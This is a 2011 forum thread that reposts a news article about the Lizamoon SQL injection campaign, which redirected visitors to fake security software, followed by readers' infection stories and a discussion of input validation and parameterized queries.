Free Republic
Browse · Search
News/Activism
Topics · Post Article

Skip to comments.

Thousands of Web Sites Hit With New Twist on Old SQL Injection Hack
newenterprise.allthingsd.com ^ | Posted on April 1, 2011 at 1:10 PM PT | by Arik Hesseldahl

Posted on 04/01/2011 1:52:38 PM PDT by Red Badger

A relatively simple hack has been used to compromise at least 500,000 Web sites, and perhaps as many as 1.5 million, in such a way that visitors are tricked into downloading fake PC security software.

Dubbed Lizamoon, after the Web site where some users are in some cases redirected, the attack was first documented by the security research firm Websense The hack seeks to trick Web users into believing that their computer has been compromised by viruses and prompts them to download fake security software that itself causes further problems. Among the sites serving up the links to the fake software sites are some belonging to Apple and used on its iTunes store, though Apple is said to have cleaned up the affected code on its site.

Websense says that so far it appears that sites using Microsoft SQL Server 2003 and 2005 are at risk, though as yet SQL Server 2008 doesn’t appear to be affected. No word yet from Microsoft about any of this, though I’ve asked them for a comment.

SQL injection attacks take place when malicious code–essentially commands to a Web server to do things it’s not supposed to do — are inserted into routine queries of a Web site’s data base. A basic way to carry out these attacks is to add extra commands into the URL bar of a the browser when visiting a vulnerable Web site. It’s not entirely clear exactly how this series of attacks has been carried out.

I talked with Josh Shaul, CTO of Application Security, Inc., a database security vendor that specializes in researching attacks on databases. “It’s a very new take on a very old type of attack,” Shaul said. “SQL injection has been the primary way that databases have been attacked for years. What’s different here is that people are putting the code that runs their Web sites in the database itself. And that’s what’s so troubling. Effectively you’ve exposed your code to an attacker so they can go modify it.”

Attackers found hundreds of thousands of sites that use a single user account to query their databases for all visitors, Shaul said. “The databases are clearly configured in an insecure way,” he said. “That’s what it all comes down to. Why is it that the log-in to use the database has the right to modify the code for the Web site itself? That makes no sense at all.”

In this case the attackers took advantage of the weakness to insert a script that creates a pop-up that sends a site’s visitors to another site that looks like a legitimate place to download new Microsoft security software. That makes the attack on the Web sites themselves just a means to an end–the end being tricking innocent Web users into clicking on a series of links and paying to download fake security software.

Websense produced a video demonstrating what happens. The short lesson is this: If you see a pop-up that tells you you’ve got a virus or that your computer is compromised by a bunch of security issues, don’t click any of the links in it; it’s probably not legit.


TOPICS: Business/Economy; Crime/Corruption; Culture/Society; Technical
KEYWORDS: computers; internetsecurity; malware; virus

1 posted on 04/01/2011 1:52:42 PM PDT by Red Badger
[ Post Reply | Private Reply | View Replies]

To: ShadowAce

PING!.............


2 posted on 04/01/2011 1:53:23 PM PDT by Red Badger (I've posted a total of 1,698 threads and 63,835 replies, as of 03-29-2011......)
[ Post Reply | Private Reply | To 1 | View Replies]

To: Red Badger

Thanks for posting.

Yesterday, I visited a new site and experienced this. A screen pretending to be a spyware/virus checker appeared to be doing a real-time scan of the machine and all sorts of threats were getting “x” marks. I happened nearly instantaneoulsy which was suspicious because all my security checkers take a LONG time to scan my machine. Then a fake dialog box popped up pretending to be a MS security alert. I was able to shut the entire browser off, then run MalwareBytes which did find one infected file. Now I need to run Spybot Search & Destroy.


3 posted on 04/01/2011 2:00:26 PM PDT by ProtectOurFreedom
[ Post Reply | Private Reply | To 1 | View Replies]

To: Red Badger

There is no excuse for SQL injection. These web sites are probably hack ASP code running on IIS.

If you use a J2EE data access framework like Hibernate, such attacks are impossible.

If you are writing in an old-fashioned environment, you should at least validate the user input. The coders are probably so dumb, they think that having a dropdown protects them. But if I can view your HTML, I can do a POST with any data I want.


4 posted on 04/01/2011 2:17:41 PM PDT by proxy_user
[ Post Reply | Private Reply | To 1 | View Replies]

To: proxy_user
If you use a J2EE data access framework like Hibernate, such attacks are impossible.

Or just writing parameterized statements using JDBC should also be sufficient, or just using Stored Procedures. It's amazing when I have interviewed potential candidates for coding positions how few know about Cross-Site Scripting and SQL Injection attacks, if you don't know those things, you are DOA as far as I'm concerned as for getting a position on my team.

5 posted on 04/01/2011 2:24:25 PM PDT by dfwgator
[ Post Reply | Private Reply | To 4 | View Replies]

To: Red Badger
I recognize these pretty quickly, one actually installed when I tried to get out of it, it locked up the whole thing and I had to pay to get my computer cleaned up. Now, when I suspect something is amiss, I pull out the internet cable to stop any download.

A girl in my office was having trouble with one of the computers, she had infected it by innocently following the instructions on the screen. Women.

6 posted on 04/01/2011 2:27:36 PM PDT by Fido969
[ Post Reply | Private Reply | To 1 | View Replies]

To: Red Badger

The other thing is that even if you click “Cancel” or the “Close” button, it will still install the malware.

Best thing to do is to just hit Control-Alt-Delete and reboot before any damage is done. Or go to the Windows Task Manager and manually kill all of your browser processes.


7 posted on 04/01/2011 2:27:36 PM PDT by dfwgator
[ Post Reply | Private Reply | To 1 | View Replies]

To: Red Badger

And now a bunch of websites are hosted on Content Management applications, like Drupal, Joomla and Wordpress, which stores the web pages in a database, instead of in JSP files or ASP files. So I can see where this could be an issue.


8 posted on 04/01/2011 2:32:12 PM PDT by dfwgator
[ Post Reply | Private Reply | To 1 | View Replies]

To: dfwgator

In many internal business applications that are behind the firewall, it may not be necessary to protect again such attacks. If only senior management has access to the application, what’s the point?

I would not be surprised if coders coming from such an environment would not know how to create a site that is accessible from the public internet.


9 posted on 04/01/2011 2:34:19 PM PDT by proxy_user
[ Post Reply | Private Reply | To 5 | View Replies]

To: Red Badger

Happened to me the other day at a site I regularly visit but I realized something was amiss.


10 posted on 04/01/2011 2:39:52 PM PDT by Retired Chemist
[ Post Reply | Private Reply | To 1 | View Replies]

To: Red Badger

Happened to me the other day at a site I regularly visit but I realized something was amiss.


11 posted on 04/01/2011 2:39:58 PM PDT by Retired Chemist
[ Post Reply | Private Reply | To 1 | View Replies]

To: Red Badger

When I shut down my computer yesterday, I notice the SQL Server Configuration Manager was on the list when I clicked the Start button. That may have nothing to do with this topic.


12 posted on 04/01/2011 2:44:33 PM PDT by Crawdad
[ Post Reply | Private Reply | To 1 | View Replies]

To: ProtectOurFreedom
I had this or a similar virus a few months back.

Even after I closed the browser via Windows Task Manager, I was unable to access HTTP addresses, but was able to access HTTPS sites.

I'm now locked down with Fartronics DeepFreeze.

Trolling for graphics to post on FR can be a dangerous practice.

13 posted on 04/01/2011 3:04:02 PM PDT by TexasCajun
[ Post Reply | Private Reply | To 3 | View Replies]

To: Red Badger; rdb3; Calvinist_Dark_Lord; GodGunsandGuts; CyberCowboy777; Salo; Bobsat; JosephW; ...

14 posted on 04/01/2011 3:13:06 PM PDT by ShadowAce (Linux -- The Ultimate Windows Service Pack)
[ Post Reply | Private Reply | To 1 | View Replies]

To: Red Badger

I wonder if this is the reason I can’t access my Fotki account?


15 posted on 04/01/2011 3:17:40 PM PDT by tubebender (Now hiring Tag Line writers. Full time low pay)
[ Post Reply | Private Reply | To 1 | View Replies]

To: TexasCajun

Fartronics???

I thought they were all hot air?


16 posted on 04/01/2011 3:31:59 PM PDT by Mr. Jazzy (Pray for our nation against the enemies of freedom.)
[ Post Reply | Private Reply | To 13 | View Replies]

To: Fido969

Whenever I see a popup that I didn’t expect to see, and especially if it’s modal (won’t let you go till you click it), I don’t even give it the courtesy of a click; I just go to task manager and shut down the Explorer process. Thus far, no problems.


17 posted on 04/01/2011 3:38:45 PM PDT by Springfield Reformer (Winston Churchill: No Peace Till Victory!)
[ Post Reply | Private Reply | To 6 | View Replies]

To: tubebender

I got this about two days ago.

I couldn’t do anything. At least I had the sense to realize it was fake.
I couldn’t open Malwarebytes.

I tried various fixes.

For me, the file was MEK.exe. It gets into your system 32 file and you cant delete it...at least I couldn’t. I am sure others can fix this easily.

Being computer illiterate..I just reinstalled Windows.


18 posted on 04/01/2011 3:40:49 PM PDT by RummyChick
[ Post Reply | Private Reply | To 15 | View Replies]

To: Red Badger

“The databases are clearly configured in an insecure way,” he said. “That’s what it all comes down to."


19 posted on 04/01/2011 4:05:23 PM PDT by for-q-clinton (If at first you don't succeed keep on sucking until you do succeed)
[ Post Reply | Private Reply | To 1 | View Replies]

To: dfwgator

Actually the best thing you can do is NOT browse the web as an administrator and if you do use the UAC that is built into windows 7. That way if something tries to install it will prompt you.


20 posted on 04/01/2011 4:07:49 PM PDT by for-q-clinton (If at first you don't succeed keep on sucking until you do succeed)
[ Post Reply | Private Reply | To 7 | View Replies]

To: proxy_user

What’s old fashioned about validating input?


21 posted on 04/01/2011 4:41:28 PM PDT by perfect_rovian_storm (The worst is behind us. Unfortunately it is really well endowed.)
[ Post Reply | Private Reply | To 4 | View Replies]

To: proxy_user

Well said. SQL injection is not difficult if you leave the doors wide open in poorly written code. A simple check is if you are expecting a value of no more than 3 chrs in length, truncate the variable to the length. You can also strip many SQL chrs before sending a value and then reject any request string that contains them.


22 posted on 04/01/2011 7:27:28 PM PDT by BornToBeAmerican (Kindness will conquer evil)
[ Post Reply | Private Reply | To 4 | View Replies]

To: ProtectOurFreedom
Yesterday, I visited a new site and experienced this.

What browser were you using?

23 posted on 04/01/2011 8:27:25 PM PDT by zeugma (The only thing in the social security trust fund is your children and grandchildren's sweat.)
[ Post Reply | Private Reply | To 3 | View Replies]

To: zeugma

FF


24 posted on 04/01/2011 11:02:45 PM PDT by ProtectOurFreedom
[ Post Reply | Private Reply | To 23 | View Replies]

To: BornToBeAmerican; perfect_rovian_storm

The method of hand-coding a check for each input field certainly works, but it is tedious, prone to error, and adds costs to the project. If there is time and money pressure, it probably won’t be implemented carefully or at all.

That is why it is much better to use a framework or technology where this is automatically supplied.


25 posted on 04/02/2011 4:29:53 AM PDT by proxy_user
[ Post Reply | Private Reply | To 22 | View Replies]

To: proxy_user

I’m not disagreeing with you, but hand-coding is NOT tedious, prone to error, and adds costs to the project.

It is very simple to write a (reusable) sub-routine or function that does this on the fly.


26 posted on 04/04/2011 7:13:49 PM PDT by BornToBeAmerican (Kindness will conquer evil)
[ Post Reply | Private Reply | To 25 | View Replies]

To: proxy_user

oh, I was referring to every returned post after the form has been submitted. Granted, coders should not allow certain values (chr’s) to be entered in a txt field, but this is not where SQL Injection comes from. Typically an injected field can be passed in the url string.

However; it is not to difficult to create a dummy site and send data to the real site. Of course this is easy to check if the data is coming from the host or not. Still this can be worked around using the header string.

Which brings me back to my first point and that is to check, validate and truncate every string that is returned to the host, no matter where from.

The coder should verify everything is legit before the submit button is pressed, but only the ignorant would assume it will always arrive ‘as sent’

This is probably more info than you wanted.


27 posted on 04/04/2011 7:25:09 PM PDT by BornToBeAmerican (Kindness will conquer evil)
[ Post Reply | Private Reply | To 25 | View Replies]

To: Red Badger; onyx; Jim Robinson; John Robinson

This just happened again to me. I am fairly certain the virus was linked to Sarah Palin pictures from Rolling Thunder. I wasn’t sure the first time, but the second time, the virus made itself apparent right away. I opened a picture of Sarah from a posting from “Crim”. The posting was about pictures of her on the RT tour commenting about a caption that I didn’t see.

Again, I am not 100%, but it seems apparent.

Good luck, and thanks for all you do. Our appreciation can never be overstated.

Brian


28 posted on 06/01/2011 6:23:41 PM PDT by onona (Yes, my state does suck ! No wait, the POLITICIANS and LIBERALS in my state suck)
[ Post Reply | Private Reply | To 1 | View Replies]

To: onona

Thanks very much for telling me, onona.

I only post photos directly from SARAHPAC or other authorized sources. Once those photos are hosted by outside sources, there’s no telling what has happened to them.

I’m so sorry for the trouble you’ve incurred. I’d be crying.


29 posted on 06/01/2011 6:34:03 PM PDT by onyx (If you truly support Sarah Palin and want to be on her busy ping list, let me know!)
[ Post Reply | Private Reply | To 28 | View Replies]

To: onyx

I consider myself fortunate, as I was on a laptop from work. They were able to fix both viruses quick and easy.

Yeah, if it was my own PC, crying, swearing, and the like.

One of the lucky ones this time.


30 posted on 06/01/2011 6:47:43 PM PDT by onona (Yes, my state does suck ! No wait, the POLITICIANS and LIBERALS in my state suck)
[ Post Reply | Private Reply | To 29 | View Replies]

To: proxy_user
But if I can view your HTML, I can do a POST with any data I want.

And how many basic generic principles of Computer Science do you have to violate to allow "data" to be "executable".

31 posted on 06/01/2011 6:57:09 PM PDT by meadsjn (Sarah 2012, or sooner)
[ Post Reply | Private Reply | To 4 | View Replies]

To: Red Badger

32 posted on 06/01/2011 6:58:24 PM PDT by cynwoody
[ Post Reply | Private Reply | To 1 | View Replies]

Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.

Free Republic
Browse · Search
News/Activism
Topics · Post Article

FreeRepublic, LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson